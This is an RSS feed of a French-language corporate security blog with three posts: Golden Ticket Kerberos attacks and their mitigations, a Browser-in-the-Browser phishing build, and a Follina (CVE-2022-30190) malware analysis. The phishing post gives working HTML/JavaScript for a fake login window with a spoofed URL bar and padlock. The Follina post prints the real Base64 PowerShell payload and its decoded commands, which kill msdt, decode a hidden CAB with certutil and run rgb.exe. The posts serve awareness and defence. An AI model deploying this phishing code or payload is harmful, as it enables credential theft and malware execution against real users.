<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[CISEL - Technical Security Blog]]></title><description><![CDATA[CISEL offre de nombreux services liés à la sécurité et partage de nombreuses informations utiles au travers de ce blog.]]></description><link>https://security.dina.ch</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1730878415923/53c8cd38-f59e-44dd-8f8e-62e2c029a0b1.png</url><title>CISEL - Technical Security Blog</title><link>https://security.dina.ch</link></image><generator>RSS for Node</generator><lastBuildDate>Sun, 19 Apr 2026 09:55:58 GMT</lastBuildDate><atom:link href="https://security.dina.ch/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Ping Castle - Golden Ticket]]></title><description><![CDATA[L'article précédent couvrait la fonctionnalité Healthcheck de Ping Castle et les résultats qu'elle retournait.
Cet article va se concentrer autour de l'aspect Golden Ticket et Kerberos
Fonctionnement
Cette faille de sécurité utilise le compte de serv...]]></description><link>https://security.dina.ch/ping-castle-golden-ticket</link><guid isPermaLink="true">https://security.dina.ch/ping-castle-golden-ticket</guid><category><![CDATA[Active Directory]]></category><category><![CDATA[PingCastle]]></category><category><![CDATA[audit]]></category><dc:creator><![CDATA[Sven Rouvinez]]></dc:creator><pubDate>Tue, 05 Jul 2022 14:52:42 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/unsplash/A_dJOYpxEVU/upload/v1657023631659/TIj2g_Ys_.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><a target="_blank" href="https://security.cisel.ch/active-directory-auditing-with-ping-castle">L'article précédent</a> couvrait la fonctionnalité <strong>Healthcheck</strong> de <a target="_blank" href="https://pingcastle.com">Ping Castle</a> et les résultats qu'elle retournait.</p>
<p>Cet article va se concentrer autour de l'aspect <strong>Golden Ticket</strong> et Kerberos</p>
<h1 id="heading-fonctionnement">Fonctionnement</h1>
<p>Cette faille de sécurité utilise le compte de service <em>KRBTGT</em> qui est nécessaire dans la distribution de ticket dans le protocole <a target="_blank" href="https://en.wikipedia.org/wiki/Kerberos_\(protocol\)">Kerberos</a> afin d'octroyer des droits à des services après authentification d'un utilisateur.</p>
<p>Avant l'octroi d'un ticket (TGT) au client par le serveur d'authentification (AS), le centre de distribution de clés (KDC) va le chiffrer en utilisant le mot de passe haché du compte <strong>KRBTGT</strong>. Ce hash est partagé entre tous les contrôleurs d'un même domaine afin de déchiffrer les "tickets" reçu des clients</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1657023979516/GKZXhskzO.png" alt="image.png" class="image--center mx-auto" /></p>
<p>L'attaque <em>Golden Ticket</em> consiste à générer sans le KDC un TGT, c'est-à-dire s'autoriser l'accès à des services sans passer par le serveur d'authentification. L'attaquant à besoin pour cela de 4 éléments (les 3 premiers points sont publiquement connus dans le domaine):</p>
<ul>
<li><p>FQDN (Fully Qualified Domain Name) du domaine</p>
</li>
<li><p><a target="_blank" href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778824\(v%3Dws.10\)">SID (Security Identifier)</a> du domaine</p>
</li>
<li><p>Nom d'utilisateur du compte dont on veut usurper l'identité</p>
</li>
<li><p>Hash du mot de passe <em>KRBTGT</em></p>
</li>
</ul>
<p>Pour avoir un ticket légitime, il faut encore récupérer ce hash pour pouvoir chiffrer le TGT et l'utiliser pour accéder aux différents services.</p>
<h2 id="heading-recuperation-du-hash">Récupération du hash</h2>
<p>Plusieurs méthodes s'offrent aux attaquants pour accéder à ce mot de passe afin d'obtenir ce précieux hash</p>
<ul>
<li><p>Voler le fichier NTDS.DIT</p>
</li>
<li><p>Compromettre un poste de travail</p>
</li>
<li><p>Utiliser <a target="_blank" href="https://blog.gentilkiwi.com/mimikatz">mimkatz</a></p>
</li>
<li><p>Mettre en place une attaque DCSync</p>
</li>
</ul>
<p>Le développement des ces points est laissé au soin du lecteur.</p>
<h2 id="heading-comment-se-proteger">Comment se protéger</h2>
<p>Comme proposé par Ping Castle, une des premières mesures à mettre en place est la rotation régulière du mot de passe du compte <em>KRBTGT</em> au minimum 2x par année et au mieux 40 jours (recommendation ANSSI). Un <a target="_blank" href="https://github.com/microsoft/New-KrbtgtKeys.ps1">script</a> est mis à disposition pour activer cette rotation</p>
<p>Les autres mesures possibles sont:</p>
<ul>
<li><p>Minimisez le nombre de comptes qui peuvent accéder au hachage du mot de passe</p>
</li>
<li><p>Réduire au minimum les possibilités pour les attaquants de voler des informations d'identification privilégiées</p>
</li>
<li><p>Surveiller l'infrastructure IT afin de détecter des TGT avec des longues durées de vies ou des changements de privilèges par exemple (si le privilège <em>debug</em> est activé)</p>
</li>
</ul>
<h1 id="heading-une-faille-critique">Une faille critique?</h1>
<p>L'anomalie de sécurité <em>Golden ticket</em> détectée permet si elle est exploitée d'accéder à des services à la place d'une autre personne mais il faut pour cela avoir les 4 éléments dont le hash du compte de service.</p>
<p>Ping Castle marque ce risque comme haut mais pour limiter l'exploitation de cette faille il suffit de mettre en place la rotation du mot de passe du compte de service <em>KRBTGT</em> qui normalement ne devrait pas impacter le fonctionnement des accès car ce compte n'est utilisé que pour octroyer les tickets.</p>
<h2 id="heading-a-propos-de-lauteur">A propos de l'auteur</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1657031379742/MzQbF0N-y.png" alt="1615489106864-modified.png" class="image--center mx-auto" /></p>
<p><a target="_blank" href="https://www.linkedin.com/in/sven-rouvinez/">Sven Rouvinez</a> Ex-Network and Security Engineer @ <a target="_blank" href="https://www.dina.ch/">Dina | The Swiss IT Company</a></p>
<h2 id="heading-references">Références</h2>
<ul>
<li><p><a target="_blank" href="https://pingcastle.com">https://pingcastle.com</a></p>
</li>
<li><p><a target="_blank" href="https://blog.quest.com/golden-ticket-attacks-how-they-work-and-how-to-defend-against-them/">https://blog.quest.com/golden-ticket-attacks-how-they-work-and-how-to-defend-against-them/</a></p>
</li>
<li><p><a target="_blank" href="https://beta.hackndo.com/kerberos-silver-golden-tickets/">https://beta.hackndo.com/kerberos-silver-golden-tickets/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Advanced Phishing - Browser-in-the-Browser Attacks (BitB)]]></title><description><![CDATA[Le phishing (hameçonnage en français 🤓) reste un des vecteurs d'attaque les plus utilisé par les hackers pour tenter de compromettre un réseau d'entreprise. Bien que les différents outils techniques sont capables de détecter de nombreux phishing et ...]]></description><link>https://security.dina.ch/advanced-phishing-browser-in-the-browser-attacks-bitb</link><guid isPermaLink="true">https://security.dina.ch/advanced-phishing-browser-in-the-browser-attacks-bitb</guid><category><![CDATA[phishing]]></category><category><![CDATA[browser]]></category><category><![CDATA[awareness]]></category><category><![CDATA[BitB]]></category><dc:creator><![CDATA[Cyrill Gremaud]]></dc:creator><pubDate>Thu, 30 Jun 2022 07:30:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/unsplash/w7ZyuGYNpRQ/upload/v1656422278453/O00pLyA-g.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Le phishing (hameçonnage en français 🤓) reste un des vecteurs d'attaque les plus utilisé par les hackers pour tenter de compromettre un réseau d'entreprise. Bien que les différents outils techniques sont capables de détecter de nombreux phishing et protéger l'utilisateur, certaines techniques de phishing avancées restent complexes à détecter.</p>
<h1 id="heading-les-limites-de-la-sensibilisation-des-collaborateurs">Les limites de la sensibilisation des collaborateurs</h1>
<p>Bien que de nombreuses entreprises soient conscientes de l'importance de former et sensibiliser leurs collaborateurs aux bonnes pratiques liées à l'utilisation des outils informatiques, ce genre de sensibilisation a ses limites.</p>
<p>Pour détecter les tentatives de phishing, nous enseignons les bonnes pratiques suivantes aux collaborateurs:</p>
<ul>
<li><p>Contrôler l'e-mail de l'expéditeur. Ne pas se fier au nom affiché</p>
</li>
<li><p>Faire attention au domaine de l'expéditeur (faux jumeaux, utilisations d'extension alternatives, etc.)</p>
</li>
<li><p>Faire attention au contenu du mail (notions de sécurité, facteur d'urgence, pression hiérarchique, demande d'informations personnelles, incitation à saisir des données dans un formulaire)</p>
</li>
<li><p>Pièce jointe inattendue en provenance d'un utilisateur non vérifié ?</p>
</li>
<li><p>Faire attention aux liens raccourcis</p>
</li>
</ul>
<p>Tout ceci est nécessaire et permet aux collaborateurs de détecter la majorité des tentatives de phishing. Mais alors, comment les hackers pourraient déjouer ce genre de contrôles ?</p>
<h1 id="heading-les-url-faciles-a-controler">Les URL - Faciles à contrôler ?</h1>
<p>Les collaborateurs comprennent rapidement l'importance de contrôler les URL lorsqu'ils sont redirigés sur un site web. Cependant, la technique Browser-in-The-Browser permet de complexifier ce point de contrôle.</p>
<p>En effet, cette technique va permettre d'afficher une URL valide à l'utilisateur dans le but de lui faire baisser sa rigueur d'analyse.</p>
<h1 id="heading-bitb-cest-quoi-exactement">BitB - C'est quoi exactement ?</h1>
<p>C'est une technique de phishing qui consiste à simuler une page web à l'intérieur d'une page web réelle. Elle tire avantage des fenêtres d'authentifications de prestataires tiers comme Google ou Facebook que certains site web proposent d'utiliser pour se connecter sur leur applications. Bien que nous ne recommandons de ne pas utiliser cette méthode, de nombreux utilisateurs le font par simplicité (ils n'ont pas besoin de créer un compte manuellement sur le site web en question). Les plus connus sont :</p>
<ul>
<li><p>Sign in with Google</p>
</li>
<li><p>Sign in with Facebook</p>
</li>
<li><p>Sign in to your account (Microsoft)</p>
</li>
</ul>
<p>Voici un exemple réel lorsqu'on essaie de se connecter sur le portail client Roomz.io par exemple. Le site nous propose de se connecter avec différents types de comptes :</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1656426709290/w9pkFB52c.png" alt="2022-06-28 16_31_28-ROOMZ _ Sign In – Brave.png" class="image--center mx-auto" /></p>
<p>Et voici ce que l'on voit si on choisit d'utiliser son compte Microsoft. On est invité à saisir son e-mail, puis son mot de passe.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1656426442699/ffyhQTR2f.png" alt="2022-06-28 16_26_31-Connectez-vous à votre compte – Brave.png" class="image--center mx-auto" /></p>
<p>Certaines pages de connexion sont un peu différentes, mais l'idée reste la même. On remarque que l'URL du navigateur pointe bien sur login.microsoftonline.com et une fois connecté, l'utilisateur est redirigé vers le site d'origine.</p>
<h1 id="heading-bitb-exemple-reel-login-prtg">BitB - Exemple réel - Login PRTG</h1>
<p>Bref, passons à la pratique ! Les utilisateurs de PRTG, logiciel de <em>Monitoring</em> d'infrastructure, peuvent utiliser le service d'authentification de Microsoft pour se connecter sur l'application.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1656427212185/lifd0aaZB.png" alt="2022-06-28 16_38_23-Welcome _ PRTG Network Monitor (SMPRTG02) – Brave.png" class="image--center mx-auto" /></p>
<p>Lorsqu'un utilisateur clique sur le bouton <strong>Log in with single sign-on</strong>, un popup Microsoft s'affiche et invite l'utilisateur à saisir son e-mail, puis son mot de passe. Si la combinaison est correcte, il est connecté sur l'application.</p>
<p>Voici la page que nous avons été capable de faire chez CISEL pour tenter de piéger nos collaborateurs sur ce service.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1656427582274/kCrM5ievz.png" alt="2022-06-28 16_43_57-Welcome _ PRTG Network Monitor – Brave.png" class="image--center mx-auto" /></p>
<p>On remarque que le domaine utilisé dans cette attaque utilise la technique des faux jumeaux pour tromper le domaine de CISEL (utilise un "<strong>i</strong>" à la place du "<strong>L</strong>"). Si l'utilisateur ne remarque pas ceci, la page de login est pratiquement impossible à identifier comme frauduleuse. En effet, on peut voir que le domaine est bien celui de Microsoft.</p>
<h1 id="heading-bref-comment-ca-fonctionne">Bref, comment ça fonctionne ?</h1>
<p>Premièrement, le but est de recréer la fenêtre du navigateur. Vu que la majorité des navigateurs utilisent un <em>layout</em> similaire, il s'agit d'avoir une barre de titre, une barre avec l'URL et le contenu en dessous.</p>
<p><strong>Exemple de structure de la fenêtre</strong></p>
<pre><code class="lang-plaintext">&lt;button id="trigger" type="button"&gt;trigger&lt;/button&gt;
&lt;div id="bitb" class="w:window" style="display: none; position: fixed; top: calc(50vh - 660px / 2); left: calc(50vw - 540px / 2)"&gt;
   &lt;div class="w:title-bar-width"&gt;
      &lt;div id="draggable" class="w:title-bar"&gt;
         &lt;!-- Title bar with title and controls --&gt;
         &lt;div class="w:title"&gt;
            &lt;img src="./svg/logo.svg" width="20px" height="15px" class="w:logo" alt="windows icon"&gt;
            &lt;span class="w:logo-description"&gt;Sign in to your account&lt;/span&gt;
         &lt;/div&gt;
         &lt;div class="w:controls"&gt;
            &lt;!-- Control group --&gt;
            &lt;div id="minimize" class="w:minimize-wrapper"&gt;
               &lt;span class="w:minimize"&gt;&lt;/span&gt;
            &lt;/div&gt;
            &lt;div id="maximize" class="w:maximize-wrapper"&gt;
               &lt;span class="w:maximize"&gt;&lt;/span&gt;
            &lt;/div&gt;
            &lt;div id="exit" class="w:exit-wrapper"&gt;
               &lt;span class="w:exit"&gt;&lt;/span&gt;
            &lt;/div&gt;
         &lt;/div&gt;
      &lt;/div&gt;
      &lt;div class="w:url-bar"&gt;
         &lt;!-- Url bar with padlock --&gt;
         &lt;div class="w:ssl-padlock-wrapper"&gt;&lt;span class="w:ssl-padlock"&gt;&lt;/span&gt;&lt;/div&gt;
         &lt;span class="w:domain-name"&gt;domain.com&lt;/span&gt;
         &lt;span class="w:domain-path"&gt;/path/here&lt;/span&gt;
         &lt;div class="w:url-end-wrapper"&gt;
            &lt;span class="w:url-end"&gt;&lt;/span&gt;
         &lt;/div&gt;
      &lt;/div&gt;
   &lt;/div&gt;
   &lt;!-- Content --&gt;
   &lt;iframe src='https://phishing.com/get/phished' class="w:content" title="example portal"&gt;&lt;/iframe&gt;
&lt;/div&gt;
</code></pre>
<p>Le plus simple pour avoir une fenêtre réutilisable est d'utiliser une <em>iframe</em> pour le contenu et d'importer le CSS dynamiquement avec du JavaScript en détectant le navigateur et le système d'exploitation.</p>
<p>**Détection OS, Browser et chargement du CSS **</p>
<pre><code class="lang-plaintext">document.addEventListener('DOMContentLoaded', async () =&gt; {
   // Detection du navigateur
   const agent = navigator.userAgent
   let browser = 'chrome'
   switch (true) {
      case Boolean(agent.match(/edg/i)):
         browser = 'edge'
         break
      case Boolean(agent.match(/opr\//i)):
         browser = 'opera'
         break
      case Boolean(navigator.brave):
         browser = 'brave'
         break
      case Boolean(agent.match(/firefox|fxios/i)):
         browser = 'firefox'
         break
   }
   // Detection du système d'exploitation (nécessite un context sécurisé (https))
   let os = 'windows10'
   try {
      let ua = await navigator.userAgentData.getHighEntropyValues(['platformVersion'])
      if (ua.platform === 'Windows') {
         let ver = parseInt(ua.platformVersion.split('.')[0])
         if (ver &gt;= 13) os = 'windows11'
      }
   } catch {}
   // Chargement du css
   let link = document.createElement('link')
   link.rel = 'stylesheet'
   link.type = 'text/css'
   link.href = `/${os}/${browser}.css`
   document.getElementsByTagName('head')[0].appendChild(link)
})
</code></pre>
<p>En recréant notre propre fenêtre, on peut fausser les informations qui devraient habituellement alerter l'utilisateur tel que l'URL et le cadenas indiquant un certificat SSL valide.</p>
<p>Une fois que la fenêtre est créée, il faut s'occuper de son comportement, c'est-à-dire :</p>
<ul>
<li><p>Déplacement</p>
</li>
<li><p>Fermer/ouvrir la fenêtre</p>
</li>
<li><p>Maximiser/minimiser</p>
</li>
</ul>
<p>Pour le déplacement, la fenêtre est en <strong>'position : fixed'</strong> et ses coordonnées changent lorsque l'utilisateur déplace (<em>drag</em>) la barre de titre.</p>
<p><strong>Gestion du déplacement de la fenêtre</strong></p>
<pre><code class="lang-plaintext">let drag = false
let x = 0
let y = 0
let bitb = document.querySelector('#bitb')

// gère le movement de la fenetre.
// inspiré par https://www.w3schools.com/howto/howto_js_draggable.asp
function move(element, event) {
   element.style.left = (element.offsetLeft - x + event.clientX) + "px"
   element.style.top = (element.offsetTop - y + event.clientY) + "px"
   x = event.clientX
   y = event.clientY
}

// Initialisation du déplacement
document.querySelector('#draggable').addEventListener('mousedown', (e) =&gt; {
   x = e.clientX
   y = e.clientY
   drag = true
})

// Déplacement de la fenêtre
window.addEventListener('mousemove', (e) =&gt; {
   if (drag) move(bitb, e)
})

// Fin du déplacement
window.addEventListener('mouseup', (e) =&gt; {
   drag = false
})
</code></pre>
<p>Pour faire apparaitre/disparaitre la fenêtre, le plus simple est de changer sa propriété <strong>'display'</strong> de <strong>'none'</strong> à <strong>'block'</strong> et vice versa.</p>
<p><strong>Affichage et cachage de la fenêtre</strong></p>
<pre><code class="lang-plaintext">// Fonctions generiques pour afficher/cacher un element
// Il aurait aussi été possible d'utiliser une classe au lieu d'un style inline
function show(element) {
   element.style.removeProperty('display');
}

function hide(element) {
   element.style.display = 'none'
}

document.querySelector('#trigger').addEventListener('click', () =&gt; {
   show(bitb)
})

document.querySelector('#exit').addEventListener('click', () =&gt; {
   hide(bitb)
})
</code></pre>
<p>La fonctionnalité de maximisation de la fenêtre peut facilement être implémentée avec l'api fullscreen du navigateur, tandis que la minimisation est plus problématique, car nous ne pouvons pas ajouter cette fenêtre à la barre de tache de l'utilisateur. Notre solution est de simuler l'animation et de fermer la fenêtre.</p>
<p><strong>Maximisation et minimisation</strong></p>
<pre><code class="lang-plaintext">// Maximisation avec l'api fullscreen
document.querySelector('#maximize').addEventListener('click', () =&gt; {
   if (document.fullscreenElement != bitb) {
      bitb.requestFullscreen()
   } else {
      document.exitFullscreen()
   }
})

// Minimisation en applicant la class minimized le temps de la transition.
// w:minimized fait une translation en hauteur sur une durée de 300ms
document.querySelector('#minimize').addEventListener('click', () =&gt; {
   bitb.classList.add('w:minimized')
   setTimeout(() =&gt; {
      bitb.style.display = 'none'
      bitb.classList.remove('w:minimized')
   }, 300);
})
</code></pre>
<p>Finalement, il reste quelques fonctionnalités à implémenter pour augmenter l'immersion de l'utilisateur.</p>
<ul>
<li><p>Décourager l'utilisateur à utiliser le site en arrière-plan</p>
</li>
<li><p>Simuler la connexion SSO</p>
</li>
</ul>
<p>Pour décourager l'utilisateur à utiliser le site en arrière-plan, nous pouvons assombrir le contenu avec un filtre, ou en affichant une animation de chargement.</p>
<p><strong>Encore un peu de fine-tunning</strong></p>
<pre><code class="lang-plaintext">/* css pour la couverture du fond */
.cover {
    position: fixed;
    z-index: 2000;
    top: 0px;
    right: 0px;
    bottom: 0px;
    left: 0px;
    background-color: rgba(0, 0, 0, 0.3);
    display: flex;
    align-items: center;
    justify-content: center;
}

/* css du spinner sur https://tobiasahlin.com/spinkit/ */
</code></pre>
<pre><code class="lang-plaintext">&lt;!-- Cover ajoutée à la page --&gt;
&lt;div id="cover" class="cover" style="display: none"&gt;
   &lt;div class="sk-chase"&gt;
      &lt;div class="sk-chase-dot"&gt;&lt;/div&gt;
      &lt;div class="sk-chase-dot"&gt;&lt;/div&gt;
      &lt;div class="sk-chase-dot"&gt;&lt;/div&gt;
      &lt;div class="sk-chase-dot"&gt;&lt;/div&gt;
      &lt;div class="sk-chase-dot"&gt;&lt;/div&gt;
      &lt;div class="sk-chase-dot"&gt;&lt;/div&gt;
   &lt;/div&gt;
&lt;/div&gt;
</code></pre>
<pre><code class="lang-plaintext">// Logique d'apparition de la cover
let cover = document.querySelector('#cover')

// ajout de l'apparition de la cover à l'evenement déjà existant
openTrigger.addEventListener('click', () =&gt; {
   show(bitb)
   show(cover)
})

// ajout de la disparition de la cover à l'evenement déjà existant
closeTrigger.addEventListener('click', () =&gt; {
   hide(bitb)
   hide(cover)
})
</code></pre>
<p>Pour simuler la connexion SSO, nous utilisons <strong>Window.postMessage</strong> pour notifier la page principale qu'elle peut rediriger l'utilisateur sur la page officielle ou fermer la fenêtre et afficher un message d'erreur.</p>
<p><strong>Simulation de connexion SSO</strong></p>
<pre><code class="lang-plaintext">// dans le document en iframe
document.querySelector('#close').addEventListener('click', () =&gt; parent.postMessage('close'))

// dans la page principale
window.addEventListener('message', (event) =&gt; {
   if (event.data == 'close') {
      hide(bitb)
      hide(cover)
      // redirection ou affichage d'une erreur comme retour à l'utilisateur
   }
})
</code></pre>
<p>Pour finir, il faut être conscient que cette technique a plusieurs limitations.</p>
<ul>
<li><p>La fenêtre est contrainte au navigateur. Si le navigateur bouge ou change de taille, la fenêtre sera impactée.</p>
</li>
<li><p>Elle n'est pas applicable aux mobiles</p>
</li>
<li><p>Les performances peuvent laisser à désirer</p>
</li>
<li><p>Elle dépend de la crédibilité de la page d'origine.</p>
</li>
</ul>
<h1 id="heading-conclusion">Conclusion</h1>
<p>Le phishing reste un vecteur d'attaque très utilisé et aucune société, peu importe sa taille ou son domaine d'activité, n'est épargnée. Former ses collaborateurs avec des programmes de sensibilisation continus est essentiel et ne doit pas être négligé. Vos collaborateurs ne doivent pas être le maillon faible de votre sécurité, mais ils doivent devenir votre partenaire principal en terme de sécurité de l'information.</p>
<h1 id="heading-a-propos-des-auteurs">A propos des auteurs</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655806418420/m2bxwTKxT.png?height=250" alt="imageedit_2_2965616244.png" class="image--center mx-auto" /></p>
<p><a target="_blank" href="https://www.linkedin.com/in/cyrillgremaud/"><strong>Cyrill Gremaud</strong></a><em>Security Solutions Architect @</em> <a target="_blank" href="https://www.dina.ch">Dina | The Swiss IT Company</a></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1656428694836/UuGwrrXft.png?height=250" alt="1632211782035-modified.png" class="image--center mx-auto" /></p>
<p><a target="_blank" href="https://www.linkedin.com/in/k%C3%A9nan-augsburger-16855817b/"><strong>Kenan Augsburger</strong></a><em>Stagiaire en sécurité @</em> <a target="_blank" href="https://www.dina.ch">Dina | The Swiss IT Company</a></p>
]]></content:encoded></item><item><title><![CDATA[Follina - Deep Dive Analysis]]></title><description><![CDATA[La faille de sécurité nommée Follina est exploitée au travers de documents Word malveillants qui utilisent un appel "ms-msdt://" pour exécuter un code malicieux (souvent du PowerShell) sur les machines, et ceci sans à devoir utiliser des macros.
Poin...]]></description><link>https://security.dina.ch/follina-deep-dive-analysis</link><guid isPermaLink="true">https://security.dina.ch/follina-deep-dive-analysis</guid><category><![CDATA[Follina]]></category><category><![CDATA[Deep dive analysis]]></category><category><![CDATA[vulnerability]]></category><dc:creator><![CDATA[Cyrill Gremaud]]></dc:creator><pubDate>Mon, 27 Jun 2022 11:04:35 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/unsplash/ZS67i1HLllo/upload/v1655731663469/LCoFrQsOo.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>La faille de sécurité nommée Follina est exploitée au travers de documents Word malveillants qui utilisent un appel "ms-msdt://" pour exécuter un code malicieux (souvent du PowerShell) sur les machines, et ceci sans à devoir utiliser des macros.</p>
<h1 id="heading-points-essentiels">Points essentiels</h1>
<p>Voici les éléments principaux à connaître concernant la vulnérabilité Follina</p>
<ul>
<li><p>MSDT = Microsoft Support Diagnostic Tool. Utilitaire pour collecter des données qui seront ensuite analysées par Microsoft pour résoudre un incident</p>
</li>
<li><p>C'est un 0-day. Il n'y a pas de patch disponible --&gt; Update 14.06.22 : Patch dispo !</p>
</li>
<li><p>Permet une exécution de code à distance</p>
</li>
<li><p>Des mitigations sont disponibles, notamment par une modification d'une clé de registre</p>
</li>
<li><p>La simple ouverture d'un fichier Word en mode "Preview" permet d'exploiter la vulnérabilité.</p>
</li>
<li><p>Numéro de CVE : 2022-30190</p>
</li>
</ul>
<h1 id="heading-un-patch-est-disponible">Un patch est disponible !</h1>
<p>Le 14 juin, Microsoft a publié un patch de sécurité qui permet de combler la faille sur les environnements Windows 10 et 11. Le numéro de la KB peut varier en fonction du système d'exploitation. Plus d'informations sont disponibles sur <a target="_blank" href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190">le site de Microsoft</a>.</p>
<h1 id="heading-mitigation-via-le-registre-windows">Mitigation via le Registre Windows</h1>
<p>Avant la sortie du patch, il était possible de mitiger l'exploitation de cette vulnérabilité en modifiant une valeur du registre afin d'empêcher les appels à l'outil de diagnostic via un lien.</p>
<ol>
<li><p>Ouvrir un invite de commande (CMD.exe) en tant qu'administrateur</p>
</li>
<li><p>Faire une sauvegarde de la clé de registre :</p>
</li>
</ol>
<ol start="3">
<li>Supprimer le clé</li>
</ol>
<p>Ceci va permettre de désactiver l'utilisation de l'appel de MSDT via une URL <strong>ms-msdt://</strong></p>
<h1 id="heading-technical-deep-dive">Technical Deep Dive</h1>
<p>L'équipe de sécurité CISEL s'est penché sur le fonctionnement détaillé de cette vulnérabilité. Pour réaliser ces analyses poussées, nous avons obtenu un fichier Word malveillant qui avait été initialement mis à disposition par <a target="_blank" href="https://twitter.com/nao_sec/status/1530196847679401984">nao_sec</a> sur Twitter et avons examiné sa structure et son contenu grâce à <a target="_blank" href="https://kali.org">Kali Linux</a>.</p>
<p>Le fichier Word que nous avons analysé contient de nombreux blocs XML ainsi qu'un fichier .rels (XML Relationship) qui contenait une référence externe vers un site web.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655728791114/dRWgasCHy.png" alt="2022-06-20 14_38_53-Rapid Response_ Microsoft Office RCE - “Follina” MSDT Attack – Brave.png" class="image--center mx-auto" /></p>
<p>Ce fichier .rels contient une référence vers un fichier HTML</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655728927805/8Wwen1eXR.png" alt="2022-06-20 14_41_40-Rapid Response_ Microsoft Office RCE - “Follina” MSDT Attack – Brave.png" class="image--center mx-auto" /></p>
<p>Au moment où l'on écrit ces lignes, la ressource web n'était plus disponible, mais nous avons pu retrouver le fichier en question grâce à une analyse <a target="_blank" href="https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/">any.run</a> qui avait été faite par <a target="_blank" href="https://twitter.com/nao_sec/status/1530196847679401984">nao_sec</a></p>
<p>Le fichier <strong>RDF842l.html</strong> contenait un bloc de code javascript exécutant la commande suivante :</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1655729556165/NH1sx_B27.png" alt="2022-06-20 14_51_11-05-2022-0438.doc (MD5_ 52945AF1DEF85B171870B31FA4782E52) - Interactive analysis .png" class="image--center mx-auto" /></p>
<p>On ne voit pas dans cette capture, mais le fichier HTML contenait de nombreux caractères "A" interprétés comme des commentaires et qui sont en fait nécessaires pour exploiter la faille (4096 bytes de padding nécessaire).</p>
<p>En analysant le code, on remarque que l'appel de <strong>ms-msdt</strong> est utilisé avec le paramètre <strong>IT_BrowseForFile</strong> qui inclut un appel PowerShell. On remarque rapidement une chaine de caractères encodée en Base64.</p>
<pre><code class="lang-plaintext">JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw==
</code></pre>
<p>Voici ce qu'elle contient une fois décodée et mise en forme:</p>
<pre><code class="lang-powershell"><span class="hljs-variable">$cmd</span> = <span class="hljs-string">"c:\windows\system32\cmd.exe"</span>;
<span class="hljs-built_in">Start-Process</span> <span class="hljs-variable">$cmd</span> <span class="hljs-literal">-windowstyle</span> <span class="hljs-keyword">hidden</span> <span class="hljs-literal">-ArgumentList</span> <span class="hljs-string">"/c taskkill /f /im msdt.exe"</span>;
<span class="hljs-built_in">Start-Process</span> <span class="hljs-variable">$cmd</span> <span class="hljs-literal">-windowstyle</span> <span class="hljs-keyword">hidden</span> <span class="hljs-literal">-ArgumentList</span> <span class="hljs-string">"/c cd C:\users\public\&amp;&amp;for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&amp;&amp;findstr TVNDRgAAAA 1.rar&gt;1.t&amp;&amp;certutil -decode 1.t 1.c &amp;&amp;expand 1.c -F:* .&amp;&amp;rgb.exe"</span>;
</code></pre>
<p>Voici les étapes clés de cet appel.</p>
<ol>
<li><p>Démarre 2 cmd.exe en mode caché</p>
</li>
<li><p>Stoppe le processus <strong>msdt.exe</strong> s'il est présent grâce à <strong>taskkill /f</strong></p>
</li>
<li><p>Effectue une recherche de fichier à l'intérieur d'un fichier .rar à la recherche d'une chaine de caractère encodée en Base64 (<strong>TVNDRgAAAA</strong>) qui s'avère être un fichier .CAB.</p>
</li>
<li><p>Stock ce fichier CAB encodé dans le fichier <strong>1.t</strong></p>
</li>
<li><p>Décode (grâce à <strong>certutil</strong>) le fichier CAB et le stocke dans le fichier <strong>1.c</strong></p>
</li>
<li><p>Exécute le fichier <strong>rgb.exe</strong> qu'il a trouvé dans le fichier <strong>1.c</strong>.</p>
</li>
</ol>
